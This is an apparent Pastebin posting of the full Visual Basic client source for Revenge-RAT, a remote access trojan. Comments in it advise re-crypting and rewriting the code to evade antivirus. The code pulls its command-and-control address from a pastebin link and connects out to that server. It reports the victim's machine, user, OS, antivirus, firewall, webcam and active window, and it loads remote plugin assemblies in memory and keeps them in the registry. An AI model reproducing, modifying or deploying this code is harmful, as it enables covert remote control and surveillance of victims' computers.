NYAN CAT | RevengeRAT Fixed + Pastebin

1. ' Fixed By NYAN CAT \\ NOV 25TH, 2018
2. ' Edited By NYAN CAT \\ Apr 9th, 2019
3.  
4. ' Revenge-RAT Client Source Code v0.3
5. ' By N A P O L E O N
6. ' You can update/Crypt the client again, learn if you want , some codes typed direct for beginners
7. ' if you want good result in runtime vs AV, rewrite some functions much as you can
8. ' Last edit: 2016/12/9
9. Imports System.Management, Microsoft.VisualBasic.Devices, System.Collections.Generic, System.Diagnostics, System.Windows.Forms, System.Globalization, System.IO.Compression, System.Net, System.Threading, Microsoft.Win32, System.Text, System.IO
10.  
11. Public Class Atomic
12.     Public OW As Boolean = False
13.     Public C As Object = Nothing
14.     Public Cn As Boolean = False
15.     Public SC = New Thread(AddressOf MAC, 1)
16.     Public PT As New Thread(AddressOf Pin)
17.     Public I As Integer = 1
18.     Public MS As Integer = 0
19.     Public Host As String
20.     Public Port As String
21.  
22.     '########################################################
23.    Public Pastebin As String = "https://pastebin.com/raw/iiKNYB2A"
24.     Public Shared Key As String = "Revenge-RAT"         'Your Key
25.    '########################################################
26.  
27.     Public ID As String = "TllBTi1DQVQ="
28.     Public MUTEX As String = "RV_MUTEX-FZMONFueOciq"
29.     Public Shared SPL As String = "*-]NK[-*"
30.     Public Shared App As String = Application.ExecutablePath
31.     Public Shared SCG As New Atomic
32.     Public Shared DI As ComputerInfo = New ComputerInfo
33.     Public Shared MT As Mutex
34.     Public Shared Tick As System.Threading.Timer = Nothing
35.  
36.  
37.     Shared Sub Main()
38.         SCG.Execute()
39.     End Sub
40.  
41.     Sub Execute()
42.         Try : MT = New Mutex(True, MUTEX, OW) : If Not OW Then End : AddHandler Application.ApplicationExit, Sub() MT.ReleaseMutex()
43.         Catch : End Try
44.         SC.Start() : PT.Start()
45.     End Sub
46.  
47.     Sub Pin()
48. RE:     If I = 0 Then : MS += 1 : End If : Thread.Sleep(1) : GoTo RE
49.     End Sub
50.  
51.     Sub data(ByVal b As Byte()) ' receive commands from RV-RAT
52.        Dim Rev As String() = Split(BS(b), Key)
53.         If Rev(0) = "PNC" Then
54.             I = 0
55.             Send("PNC")
56.         ElseIf Rev(0) = "P" Then
57.             I = 1
58.             Send("P" & Key & MS)
59.             MS = 0
60.             Send("W" & Key & GAW())
61.         ElseIf Rev(0) = "IE" Then ' Ask about plugin
62.            If Not Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & Rev(1), True) Is Nothing Then : Try : INV(Host, Port, Rev(4), Rev(5), Encode(Decode(ID) & "_" & HWD()), Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & Rev(1), Rev(1), Nothing).ToString, Rev(2), Rev(3), Rev(1), True) : Catch : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End Try : Else : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End If
63.         ElseIf Rev(0) = "LP" Then ' invoke plugin
64.            INV(Host, Port, Rev(1), Rev(2), Encode(Decode(ID) & "_" & HWD()), Rev(3), Rev(4), Rev(5), Rev(6), Rev(7))
65.         ElseIf Rev(0) = "UNV" Then ' uninstall - restart - close .. etc
66.            LA(Rev(1)).CreateInstance(Rev(2)).UNI(Encode(MUTEX), Rev(3), Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Rev(4), Rev(5), App, Rev(6), Rev(7), Rev(8), Rev(9), Rev(10), Rev(11), Rev(12), Rev(13))
67.         End If
68.     End Sub
69.  
70.     Public Function INV(ByVal H As String, P As String, N As String, C As String, ID As String, Bytes As String, S As Integer, M As Boolean, MD5 As String, B As Boolean) ' invoke plugin
71.        LA(Bytes).CreateInstance(N & "." & C, True).Start(ID, S, H, P, Key, SPL) : If M Then : Try : If Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & MD5, True) Is Nothing Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : Catch : End Try : If B = False Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : End If
72.     End Function
73.  
74.     Public Function LA(B As String) ' load assembly
75.        Return Reflection.Assembly.Load(Decompress(Convert.FromBase64String(B)))
76.     End Function
77.  
78.     Public Function IR(ByVal P As String, N As String, B As String) ' add reg value
79.        Try : Registry.SetValue(P, N, B) : Catch : End Try
80.     End Function
81.  
82.     Sub MAC()
83.  
84.         Dim M As Object = New MemoryStream
85.         Dim lp As Integer = 0
86. re:
87.         Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
88.         Try
89.             If C Is Nothing Then GoTo e
90.             If C.Client.Connected = False Then GoTo e
91.             If Cn = False Then GoTo e
92.             lp += 1
93.             If lp > 300 Then
94.                 lp = 0
95.                 If C.Client.Poll(-1, Sockets.SelectMode.SelectRead) And C.Client.Available <= 0 Then GoTo e
96.             End If
97.             If C.Available > 0 Then
98.                 Dim B(C.Available - 1) As Byte
99.                 C.Client.Receive(B, 0, B.Length, Sockets.SocketFlags.None)
100.                 M.Write(B, 0, B.Length)
101. rr:
102.                 If BS(M.ToArray).Contains(SPL) Then
103.                     Dim A As Array = fx(M.ToArray, SPL)
104.                     Dim T As New Thread(AddressOf data)
105.                     T.Start(A(0))
106.                     M.Dispose()
107.                     M = New IO.MemoryStream
108.                     If A.Length = 2 Then
109.                         M.Write(A(1), 0, A(1).length)
110.                         GoTo rr
111.                     End If
112.                 End If
113.             End If
114.         Catch
115.             GoTo e
116.         End Try
117.         Thread.CurrentThread.Sleep(1)
118.         GoTo re
119. e:
120.         Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
121.         Cn = False
122.         Try
123.             C.Client.Disconnect(False)
124.         Catch
125.         End Try
126.         Try
127.             M.Dispose()
128.         Catch
129.         End Try
130.         Try
131.             Tick.Dispose()
132.         Catch
133.         End Try
134.         M = New MemoryStream
135.         Dim IC As Boolean = False
136.  
137.         Try
138.             Using wc As New WebClient
139.                 Dim Cred As New NetworkCredential("", "")
140.                 wc.Credentials = Cred
141.                 Dim Resp As String = wc.DownloadString(Pastebin)
142.                 Dim SPLT As String() = Split(Resp, ":")
143.                 Host = SPLT(0)
144.                 Port = SPLT(1)
145.             End Using
146.  
147.             C = New Sockets.TcpClient() With {.ReceiveTimeout = -1, .SendTimeout = -1, .SendBufferSize = 999999, .ReceiveBufferSize = 999999}
148.             lp = 0
149.             CK().Connect(Host, Convert.ToInt32(Port))
150.             Cn = True
151.  
152.             Send("Information" & Key & ID & Key & Encode("_" & HWD()) & Key & IP() & Key & Encode(Environment.MachineName & " / " & Environment.UserName) & Key & CIVC() & Key & Encode(DI.OSFullName & " " & OP()) & Key & Encode(MP()) & Key & DI.TotalPhysicalMemory & Key & GetProduct("Select * from AntiVirusProduct") & Key & GetProduct("SELECT * FROM FirewallProduct") & Key & Port & Key & GAW() & Key & Encode(CultureInfo.CurrentCulture.Name) & Key & "False") ' RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread
153.            IC = True
154.             Dim T As New TimerCallback(AddressOf Ping)
155.             Tick = New Threading.Timer(T, Nothing, 10000, 30000)
156.             GoTo re
157.         Catch
158.             Thread.Sleep(2500) ' replace it for reconnect time in ms , like 2500 or 5000
159.        End Try
160.  
161.             If IC = True Then
162.             IC = False
163.             GoTo e
164.         End If
165.         GoTo re
166.     End Sub
167.  
168.     Sub Ping()
169.         Send("alive??")
170.     End Sub
171.  
172.     Function CK()
173.         Return C.Client
174.     End Function
175.  
176.     Public Sub Send(ByVal b As Byte())
177.         If Cn = False Then Exit Sub
178.         Try
179.             Dim r As Object = New MemoryStream
180.             r.Write(b, 0, b.Length)
181.             r.Write(SB(SPL), 0, SPL.Length)
182.             C.Client.SendBufferSize = b.Length
183.             C.Client.Poll(-1, Net.Sockets.SelectMode.SelectWrite)
184.             C.Client.Send(r.ToArray, 0, r.Length, Sockets.SocketFlags.None)
185.             r.Dispose()
186.         Catch
187.             Cn = False
188.         End Try
189.     End Sub
190.  
191.     Public Sub Send(ByVal S As String)
192.         Send(SB(S))
193.     End Sub
194.  
195.     Public Function IP()
196.         Try : Return CType(Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0), IPAddress).ToString() : Catch : Return "????" : End Try
197.     End Function
198.  
199.     Private Declare Function GVI Lib "kernel32" Alias "GetVolumeInformationA" (ByVal IP As String, ByVal V As String, ByVal T As Integer, ByRef H As Integer, ByRef Q As Integer, ByRef G As Integer, ByVal J As String, ByVal X As Integer) As Integer : Private Declare Function GFW Lib "user32" Alias "GetForegroundWindow" () As IntPtr : Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As IntPtr, ByVal lpString As StringBuilder, ByVal cch As Integer) As Integer : Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
200.     <Runtime.InteropServices.DllImport("psapi")>
201.     Public Shared Function EmptyWorkingSet(ByVal hProcess As Long) As Boolean
202.     End Function
203.  
204.     Public Function HWD() As String
205.         Try : Dim HSN As Integer : GVI(Environ("SystemDrive") & "\", Nothing, Nothing, HSN, 0, 0, Nothing, Nothing) : Return Hex(HSN) : Catch : Return "ERR" : End Try
206.     End Function
207.  
208.     Public Function CIVC() As String
209.         Try : For i As Integer = 0 To 4 : If capGetDriverDescriptionA(i, Space(100), 100, Nothing, 100) Then : Return "Yes" : End If : Next : Catch : End Try : Return "No"
210.     End Function
211.  
212.     Public Shared Function OP() As String
213.         Try : For Each SC As ManagementObject In New ManagementObjectSearcher("select * from Win32_Processor").[Get]() : Return Convert.ToInt32(SC("AddressWidth")) : Next : Catch : Return "????" : End Try
214.     End Function
215.  
216.     Public Function GetProduct(ByVal Product As String) As String
217.         Try : Dim PN As String = String.Empty : For Each AV As ManagementObject In New ManagementObjectSearcher("root\SecurityCenter" & IIf(DI.OSFullName.Contains("XP"), "", "2").ToString, Product).Get : PN &= AV("displayName").ToString : Next : If Not PN = String.Empty Then : Return Encode(PN) : Else : Return Encode("N/A") : End If : Catch : Return Encode("N/A") : End Try
218.     End Function
219.  
220.     Public Function MP()
221.         Try : Return Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0", "ProcessorNameString", Nothing).ToString : Catch : Return "????" : End Try
222.     End Function
223.  
224.     Public Function GAW() As String
225.         Dim W As New StringBuilder(256) : GetWindowText(GFW(), W, W.Capacity) : Return Encode(W.ToString())
226.     End Function
227.  
228.     Function SB(ByVal s As String) As Byte()
229.         Return Encoding.Default.GetBytes(s)
230.     End Function
231.  
232.     Function BS(ByVal b As Byte()) As String
233.         Return Encoding.Default.GetString(b)
234.     End Function
235.  
236.     Function fx(ByVal b As Byte(), ByVal WRD As String) As Array
237.         Dim a As New List(Of Byte()), M As New MemoryStream, MM As New MemoryStream, T As String() = Split(BS(b), WRD) : M.Write(b, 0, T(0).Length) : MM.Write(b, T(0).Length + WRD.Length, b.Length - (T(0).Length + WRD.Length)) : a.Add(M.ToArray) : a.Add(MM.ToArray) : M.Dispose() : MM.Dispose() : Return a.ToArray
238.     End Function
239.  
240.     Public Function Decompress(data As Byte()) As Byte()
241.         Dim input As New MemoryStream() : input.Write(data, 0, data.Length) : input.Position = 0
242.         Dim gzip As New GZipStream(input, CompressionMode.Decompress, True), output As New MemoryStream(), buff As Byte() = New Byte(63) {}, read As Integer = -1
243.         read = gzip.Read(buff, 0, buff.Length) : While read > 0 : output.Write(buff, 0, read) : read = gzip.Read(buff, 0, buff.Length) : End While : gzip.Close() : Return output.ToArray()
244.     End Function
245.  
246.     Public Function Encode(ByVal Input As String)
247.         Return Convert.ToBase64String(Encoding.UTF8.GetBytes(Input))
248.     End Function
249.  
250.     Public Function Decode(ByVal Input As String)
251.         Return Encoding.UTF8.GetString(Convert.FromBase64String(Input))
252.     End Function
253.  
254. End Class